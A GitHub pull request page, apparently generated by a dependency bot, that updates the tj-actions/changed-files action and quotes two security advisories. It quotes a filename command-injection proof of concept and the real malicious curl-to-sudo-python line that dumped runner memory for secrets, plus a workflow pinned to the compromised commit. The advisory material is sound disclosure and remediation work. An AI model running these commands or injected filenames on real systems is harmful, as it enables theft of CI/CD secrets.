Skip to content

Update tj-actions/changed-files action to v46 [SECURITY]#119

Open
renovate[bot] wants to merge 1 commit intomainfrom
renovate/github-tags-tj-actions-changed-files-vulnerability
Open

Update tj-actions/changed-files action to v46 [SECURITY]#119
renovate[bot] wants to merge 1 commit intomainfrom
renovate/github-tags-tj-actions-changed-files-vulnerability

Conversation

@renovate
Copy link
Contributor

@renovate renovate bot commented Feb 27, 2026

ℹ️ Note

This PR body was truncated due to platform limits.

This PR contains the following updates:

Package Type Update Change
tj-actions/changed-files action major v35v46

GitHub Vulnerability Alerts

CVE-2023-51664

Summary

The tj-actions/changed-files workflow allows for command injection in changed filenames, allowing an attacker to execute arbitrary code and potentially leak secrets.

Details

The changed-files action returns a list of files changed in a commit or pull request which provides an escape_json input enabled by default, only escapes " for JSON values.

This could potentially allow filenames that contain special characters such as ; and ` (backtick) which can be used by an attacker to take over the GitHub Runner if the output value is used in a raw fashion (thus being directly replaced before execution) inside a run block. By running custom commands an attacker may be able to steal secrets such as GITHUB_TOKEN if triggered on other events than pull_request. For example on push.

Proof of Concept

  1. Submit a pull request to a repository with a new file injecting a command. For example $(whoami).txt which is a valid filename.
  2. Upon approval of the workflow (triggered by the pull request), the action will get executed and the malicious pull request filename will flow into the List all changed files step below.
      - name: List all changed files
        run: |
          for file in $; do
            echo "$file was changed"
          done

Example output:

##[group]Run for file in $(whoami).txt; do
    for file in $(whoami).txt; do
        echo "$file was changed"
    done
shell: /usr/bin/bash -e {0}

##[endgroup]
runner.txt was changed

Impact

This issue may lead to arbitrary command execution in the GitHub Runner.

Resolution

  • A new safe_output input would be enabled by default and return filename paths escaping special characters like ;, ` (backtick), $, (), etc for bash environments.

  • A safe recommendation of using environment variables to store unsafe outputs.

- name: List all changed files
  env:
    ALL_CHANGED_FILES: $
  run: |
    for file in "$ALL_CHANGED_FILES"; do
      echo "$file was changed"
    done

Resources

CVE-2025-30066

Summary

A supply chain attack compromised the tj-actions/changed-files GitHub Action, impacting over 23,000 repositories. Attackers retroactively modified multiple version tags to reference a malicious commit, exposing CI/CD secrets in workflow logs. The vulnerability existed between March 14 and March 15, 2025, and has since been mitigated. This poses a significant risk of unauthorized access to sensitive information.

This has been patched in v46.0.1.

Details

The attack involved modifying the tj-actions/changed-files GitHub Action to execute a malicious Python script. This script extracted secrets from the Runner Worker process memory and printed them in GitHub Actions logs, making them publicly accessible in repositories with public workflow logs.

Key Indicators of Compromise (IoC):

  • Malicious commit: 0e58ed8671d6b60d0890c21b07f8835ace038e67
  • Retroactively updated tags pointing to the malicious commit:
    • v1.0.0: 0e58ed8671d6b60d0890c21b07f8835ace038e67
    • v35.7.7-sec: 0e58ed8671d6b60d0890c21b07f8835ace038e67
    • v44.5.1: 0e58ed8671d6b60d0890c21b07f8835ace038e67

Malicious Code Execution:

The malicious script downloaded and executed a Python script that scanned memory for secrets, base64-encoded them, and logged them in the build logs:

B64_BLOB=`curl -sSf https://gist.githubusercontent.com/nikitastupin/30e525b776c409e03c2d6f328f254965/raw/memdump.py | sudo python3`

This script targeted the Runner Worker process, extracting and exfiltrating its memory contents.

Proof of Concept (PoC)

Steps to Reproduce:

  1. Create a GitHub Actions workflow using the tj-actions/changed-files action:
name: "tj-action changed-files incident"
on:
  pull_request:
    branches:
      - main
jobs:
  changed_files:
    runs-on: ubuntu-latest
    steps:
      - name: Get changed files
        id: changed-files
        uses: tj-actions/changed-files@0e58ed8671d6b60d0890c21b07f8835ace038e67
  1. Run the workflow and inspect the logs in the Actions tab.
  2. Vulnerable workflows may display secrets in the logs.

Detection:

Analyze network traffic using Harden-Runner, which detects unauthorized outbound requests to:

  • gist.githubusercontent.com

Live reproduction logs:
🔗 Harden-Runner Insights

This attack was detected by StepSecurity when anomaly detection flagged an unauthorized outbound network call to gist.githubusercontent.com.

Duration of Vulnerability

The vulnerability was active between March 14 and March 15, 2025.

Action Required

  1. Review your workflows executed between March 14 and March 15:

    • Check the changed-files section for unexpected output.
    • Decode suspicious output using the following command: 
      echo 'xxx' | base64 -d | base64 -d
    • If the output contains sensitive information (e.g., tokens or secrets), revoke and rotate those secrets immediately.

  2. Update workflows referencing the compromised commit:

    • If your workflows reference the malicious commit directly by its SHA, update them immediately to avoid using the compromised version.

  3. Tagged versions:

    • If you are using tagged versions (e.g., v35, v44.5.1), no action is required as these tags have been updated and are now safe to use.

  4. Rotate potentially exposed secrets:

    • As a precaution, rotate any secrets that may have been exposed during this timeframe to ensure the continued security of your workflows.

Impact

  • Type of vulnerability: Supply chain attack, Secrets exposure, Information leakage
  • Who is impacted:
    • Over 23,000 repositories using tj-actions/changed-files.
    • Organizations with public repositories are at the highest risk, as their logs may already be compromised.
  • Potential consequences:
    • Theft of CI/CD secrets (API keys, cloud credentials, SSH keys).
    • Unauthorized access to source code, infrastructure, and production environments.
    • Credential leaks in public repositories, enabling further supply chain attacks.

Release Notes

tj-actions/changed-files (tj-actions/changed-files)

v46

Compare Source

🚀 Features

➖ Remove

🔄 Update

Co-authored-by: github-actions[bot] <41898282+github-actions[bot]@​users.noreply.github.com> (3dbc1e1) - (github-actions[bot])

Co-authored-by: github-actions[bot] <41898282+github-actions[bot]@​users.noreply.github.com> (b1ccff8) - (github-actions[bot])

Co-authored-by: github-actions[bot] <41898282+github-actions[bot]@​users.noreply.github.com> (050a3d3) - (github-actions[bot])

📚 Documentation

  • Update link to glob patterns (#​2590) (a892f50) - (Tonye Jack)
  • Add Jellyfrog as a contributor for code, and doc (#​2573) (f000a9b) - (allcontributors[bot])

🧪 Testing

⚙️ Miscellaneous Tasks

⬆️ Upgrades

Co-authored-by: github-actions[bot] <41898282+github-actions[bot]@​users.noreply.github.com> (db731a1) - (github-actions[bot])

v45

Compare Source

🐛 Bug Fixes

⚙️ Miscellaneous Tasks

Configuration

📅 Schedule: Branch creation - "" (UTC), Automerge - At any time (no schedule defined).

🚦 Automerge: Disabled by config. Please merge this manually once you are satisfied.

Rebasing: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.

🔕 Ignore: Close this PR and you won't be reminded about this update again.

  • If you want to rebase/retry this PR, check this box

This PR was generated by Mend Renovate. View the repository job log.

@aviator-app
Copy link

aviator-app bot commented Feb 27, 2026

Current Aviator status

Aviator will automatically update this comment as the status of the PR changes.
Comment /aviator refresh to force Aviator to re-examine your PR (or learn about other /aviator commands).

This pull request is currently open (not queued).

How to merge

To merge this PR, comment /aviator merge or add the mergequeue label.

See the real-time status of this PR on the Aviator webapp.
Use the Aviator Chrome Extension to see the status of your PR within GitHub.

@performance-testing-bot
Copy link

performance-testing-bot bot commented Feb 27, 2026

Unable to locate .performanceTestingBot config file

@secure-code-warrior-for-github
Copy link

secure-code-warrior-for-github bot commented Feb 27, 2026

Micro-Learning Topic: OS command injection (Detected by phrase)

Matched on "command injection"

What is this? (2min video)

In many situations, applications will rely on OS provided functions, scripts, macros and utilities instead of reimplementing them in code. While functions would typically be accessed through a native interface library, the remaining three OS provided features will normally be invoked via the command line or launched as a process. If unsafe inputs are used to construct commands or arguments, it may allow arbitrary OS operations to be performed that can compromise the server.

Try a challenge in Secure Code Warrior

Helpful references
  • OWASP Command Injection - OWASP community page with comprehensive information about command injection, and links to various OWASP resources to help detect or prevent it.
  • OWASP testing for Command Injection - This article is focused on providing testing techniques for identifying command injection flaws in your applications

Micro-Learning Topic: Information disclosure (Detected by phrase)

Matched on "Information leakage"

Many web applications and APIs do not properly protect sensitive data, such as financial, healthcare, and PII. Attackers may steal or modify such weakly protected data to conduct credit card fraud, identity theft, or other crimes. Sensitive data may be compromised without extra protection, such as encryption at rest or in transit, and requires special precautions when exchanged with the browser. Source: https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project

Try a challenge in Secure Code Warrior

@difflens
Copy link

difflens bot commented Feb 27, 2026

View changes in DiffLens

@AdamOswald
Copy link
Owner

AdamOswald commented Feb 27, 2026

Snyk checks have passed. No issues have been found so far.

Status Scanner Critical High Medium Low Total (0)
Open Source Security 0 0 0 0 0 issues

💻 Catch issues earlier using the plugins for VS Code, JetBrains IDEs, Visual Studio, and Eclipse.

@socket-security
Copy link

socket-security bot commented Feb 27, 2026

Review the following changes in direct dependencies. Learn more about Socket for GitHub.

Diff Package Supply Chain
Security		 Vulnerability Quality Maintenance License
Addedipython@​9.10.07310010010070
Addedkornia@​0.8.274100100100100
Addedpip@​26.0.17410010010070
Addedpipenv@​2026.0.37510010010070
Addedpaddlenlp@​2.8.175100100100100
Addednumba@​0.64.075100100100100
Addedfilterpy@​1.4.510010010075100
Addeddill@​0.4.180100100100100
Addedpsutil@​7.2.294100100100100
Addeddlib@​20.0.09710010010070
Addedeinops@​0.8.297100100100100
Addedaiohttp@​3.13.397100100100100
Addedpaddlefsl@​1.1.098100100100100
Addedigraph@​1.0.09910010010070
Addedgrpcio@​1.78.110010010010070
Addedpaddle2onnx@​2.1.099100100100100
Addedjedi@​0.19.299100100100100
Addedimageio-ffmpeg@​0.6.099100100100100
Addedclip-anytorch@​2.6.0100100100100100
Addedlpips@​0.1.4100100100100100
Addedmarkupsafe@​3.0.3100100100100100
Addedomegaconf@​2.3.0100100100100100

View full report

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Reviewers

No reviews

Assignees

No one assigned

Labels

size/XS

Projects

None yet

Milestone

No milestone

Development

Successfully merging this pull request may close these issues.

1 participant

@AdamOswald